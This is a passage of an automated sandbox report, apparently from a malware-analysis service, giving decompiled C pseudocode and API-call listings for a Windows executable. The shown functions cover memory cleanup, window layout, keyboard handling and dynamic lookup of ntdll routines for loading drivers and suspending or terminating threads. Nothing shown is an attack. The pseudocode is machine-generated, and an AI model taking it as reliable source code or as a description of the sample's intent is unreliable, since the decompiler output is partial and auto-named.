                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                • memcpy.MSVCRT ref: 0040696D
                                                                                                                • memcpy.MSVCRT ref: 0040697E
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 975042529-0
                                                                                                                • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				void* _v20;
                                                                                                                				int _v24;
                                                                                                                				void _v56;
                                                                                                                				char _v584;
                                                                                                                				char _v588;
                                                                                                                				char _v41548;
                                                                                                                				void* __edi;
                                                                                                                				void* _t40;
                                                                                                                				void _t46;
                                                                                                                				intOrPtr _t47;
                                                                                                                				intOrPtr* _t64;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				intOrPtr _t67;
                                                                                                                				intOrPtr _t71;
                                                                                                                				int _t77;
                                                                                                                				void* _t80;
                                                                                                                				void* _t81;
                                                                                                                				void* _t82;
                                                                                                                				void* _t83;
                                                                                                                
                                                                                                                				E0040B550(0xa248, __ecx);
                                                                                                                				_t77 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				E00408E31();
                                                                                                                				_t40 =  *0x41c47c;
                                                                                                                				if(_t40 != 0) {
                                                                                                                					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                                                				}
                                                                                                                				if(_v8 == _t77) {
                                                                                                                					_v8 = 0x186a0;
                                                                                                                				}
                                                                                                                				_v8 = _v8 + 0x3e80;
                                                                                                                				_push(_v8);
                                                                                                                				L0040B26C();
                                                                                                                				_t81 = _t40;
                                                                                                                				_v20 = _t81;
                                                                                                                				memset(_t81, _t77, _v8);
                                                                                                                				_t83 = _t82 + 0x10;
                                                                                                                				_v24 = _t77;
                                                                                                                				E00408E31();
                                                                                                                				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                                                				L5:
                                                                                                                				while(1) {
                                                                                                                					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                                                						L16:
                                                                                                                						_t46 =  *_t81;
                                                                                                                						_t77 = 0;
                                                                                                                						if(_t46 == 0) {
                                                                                                                							_push(_v20);
                                                                                                                							L0040B272();
                                                                                                                							return _t46;
                                                                                                                						}
                                                                                                                						_t81 = _t81 + _t46;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					_t47 = _a4;
                                                                                                                					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                                                					_v12 = _t77;
                                                                                                                					_v16 = _t71;
                                                                                                                					if(_t71 <= _t77) {
                                                                                                                						L10:
                                                                                                                						_t66 = 0;
                                                                                                                						L11:
                                                                                                                						if(_t66 == 0) {
                                                                                                                							E004090AF( &_v588);
                                                                                                                							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                							_t32 = _t81 + 0x20; // 0x20
                                                                                                                							memcpy( &_v56, _t32, 8);
                                                                                                                							_t83 = _t83 + 0x10;
                                                                                                                							E004099ED(_a4 + 0x28,  &_v588);
                                                                                                                						} else {
                                                                                                                							_t26 = _t66 + 4; // 0x4
                                                                                                                							_t72 = _t26;
                                                                                                                							if( *_t26 == 0) {
                                                                                                                								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                								_t28 = _t81 + 0x20; // 0x20
                                                                                                                								memcpy(_t66 + 0x214, _t28, 8);
                                                                                                                								_t83 = _t83 + 0x10;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                                                					_t80 = _t47 + 0x28;
                                                                                                                					while(1) {
                                                                                                                						_t64 = E00405A92(_v12, _t80);
                                                                                                                						if( *_t64 == _t67) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_v12 = _v12 + 1;
                                                                                                                						if(_v12 < _v16) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					_t66 = _t64;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                • memset.MSVCRT ref: 00409805
                                                                                                                • memcpy.MSVCRT ref: 0040988A
                                                                                                                • memcpy.MSVCRT ref: 004098C0
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3641025914-0
                                                                                                                • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E004067AC(char** __edi) {
                                                                                                                				void* __esi;
                                                                                                                				void* _t9;
                                                                                                                				void** _t11;
                                                                                                                				char** _t15;
                                                                                                                				char** _t24;
                                                                                                                				void* _t25;
                                                                                                                				char* _t28;
                                                                                                                				char* _t29;
                                                                                                                				char* _t30;
                                                                                                                				char* _t31;
                                                                                                                				char** _t33;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				 *__edi = "cf@";
                                                                                                                				_t9 = E00406746(__edi);
                                                                                                                				_t28 = __edi[5];
                                                                                                                				if(_t28 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t28);
                                                                                                                					_push(_t28);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t29 = _t24[4];
                                                                                                                				if(_t29 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t29);
                                                                                                                					_push(_t29);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t30 = _t24[3];
                                                                                                                				if(_t30 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t30);
                                                                                                                					_push(_t30);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t31 = _t24[2];
                                                                                                                				if(_t31 != 0) {
                                                                                                                					E004055D1(_t9, _t31);
                                                                                                                					_push(_t31);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t15 = _t24;
                                                                                                                				_pop(_t32);
                                                                                                                				_push(_t24);
                                                                                                                				_t33 = _t15;
                                                                                                                				_t25 = 0;
                                                                                                                				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                                                					do {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                                                						_t25 = _t25 + 1;
                                                                                                                					} while (_t25 < _t33[0xd]);
                                                                                                                				}
                                                                                                                				_t11 =  *( *_t33)();
                                                                                                                				free( *_t11);
                                                                                                                				return _t11;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                • free.MSVCRT(00000000), ref: 00406839
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2241099983-0
                                                                                                                • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct tagPOINT _v20;
                                                                                                                				struct tagRECT _v36;
                                                                                                                				int _t27;
                                                                                                                				struct HWND__* _t30;
                                                                                                                				struct HWND__* _t32;
                                                                                                                
                                                                                                                				_t30 = _a4;
                                                                                                                				if((_a8 & 0x00000001) != 0) {
                                                                                                                					_t32 = GetParent(_t30);
                                                                                                                					GetWindowRect(_t30,  &_v20);
                                                                                                                					GetClientRect(_t32,  &_v36);
                                                                                                                					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                                					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                					_v20.x = _t27;
                                                                                                                					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                				}
                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                					E00404FBB(_t30);
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00405D0A
                                                                                                                • GetWindowRect.USER32 ref: 00405D17
                                                                                                                • GetClientRect.USER32 ref: 00405D22
                                                                                                                • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				void* _t20;
                                                                                                                				void* _t21;
                                                                                                                				signed int _t28;
                                                                                                                				void* _t32;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_t20 = __eax;
                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                				_push(__ebx);
                                                                                                                				_t28 = __eax - 1;
                                                                                                                				L0040B26C();
                                                                                                                				_v16 = __eax;
                                                                                                                				if(_t28 > 0) {
                                                                                                                					_t21 = _a4;
                                                                                                                					_v8 = __ebx;
                                                                                                                					_v8 =  ~_v8;
                                                                                                                					_t32 = _t28 * __ebx + _t21;
                                                                                                                					_a4 = _t21;
                                                                                                                					do {
                                                                                                                						memcpy(_v16, _a4, __ebx);
                                                                                                                						memcpy(_a4, _t32, __ebx);
                                                                                                                						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                                						_a4 = _a4 + __ebx;
                                                                                                                						_t32 = _t32 + _v8;
                                                                                                                						_t34 = _t34 + 0x24;
                                                                                                                						_v12 = _v12 + 1;
                                                                                                                						_t28 = _t28 - 1;
                                                                                                                					} while (_t28 > _v12);
                                                                                                                				}
                                                                                                                				_push(_v16);
                                                                                                                				L0040B272();
                                                                                                                				return _t20;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252195045-0
                                                                                                                • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00406746(void* __esi) {
                                                                                                                				intOrPtr _t9;
                                                                                                                				intOrPtr _t10;
                                                                                                                				intOrPtr _t11;
                                                                                                                				intOrPtr* _t18;
                                                                                                                				void* _t19;
                                                                                                                
                                                                                                                				_t19 = __esi;
                                                                                                                				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                                                				if(_t9 != 0) {
                                                                                                                					_push(_t9);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                                                				if(_t10 != 0) {
                                                                                                                					_push(_t10);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                                                				if(_t11 != 0) {
                                                                                                                					_push(_t11);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t11 =  *_t18;
                                                                                                                					if(_t11 != 0) {
                                                                                                                						_push(_t11);
                                                                                                                						L0040B272();
                                                                                                                						 *_t18 = 0;
                                                                                                                					}
                                                                                                                					_push(_t18);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                                                				return _t11;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				struct HDWP__* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* __ebx;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr _t42;
                                                                                                                				RECT* _t44;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t42 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_a4 != 5) {
                                                                                                                					if(_a4 != 0xf) {
                                                                                                                						if(_a4 == 0x24) {
                                                                                                                							_t37 = _a12;
                                                                                                                							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                                                							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						E00402EC8(__ecx + 0x378);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v8 = BeginDeferWindowPos(3);
                                                                                                                					_t44 = _t42 + 0x378;
                                                                                                                					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                                                					EndDeferWindowPos(_v8);
                                                                                                                					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                                                					_t42 = _v12;
                                                                                                                				}
                                                                                                                				return E00402CED(_t42, _a4, _a8, _a12);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                				int _t14;
                                                                                                                
                                                                                                                				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                                                					GetKeyState(0xa2);
                                                                                                                					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                                                						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                                                							_t14 = E00403A60(0xa5);
                                                                                                                							if(_t14 == 0) {
                                                                                                                								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                  • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: State$CallMessageProcSendWindow
                                                                                                                • String ID: A
                                                                                                                • API String ID: 3924021322-3554254475
                                                                                                                • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v1072;
                                                                                                                				void _v3672;
                                                                                                                				char _v4496;
                                                                                                                				intOrPtr _v4556;
                                                                                                                				char _v4560;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t41;
                                                                                                                				void* _t45;
                                                                                                                
                                                                                                                				_t45 = __eflags;
                                                                                                                				E0040B550(0x11cc, __ecx);
                                                                                                                				E00402923( &_v4560);
                                                                                                                				_v4560 = 0x40db44;
                                                                                                                				E00406670( &_v4496, _t45);
                                                                                                                				_v4496 = 0x40dab0;
                                                                                                                				memset( &_v3672, 0, 0x10);
                                                                                                                				E0040A909( &_v1072);
                                                                                                                				_t41 = _a4;
                                                                                                                				_v4556 = 0x71;
                                                                                                                				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                                                					L0040B266();
                                                                                                                					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                                                				}
                                                                                                                				_v4496 = 0x40dab0;
                                                                                                                				_v4560 = 0x40db44;
                                                                                                                				E004067AC( &_v4496);
                                                                                                                				return E00402940( &_v4560);
                                                                                                                			}














                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                • memset.MSVCRT ref: 00403537
                                                                                                                • _ultow.MSVCRT ref: 00403575
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
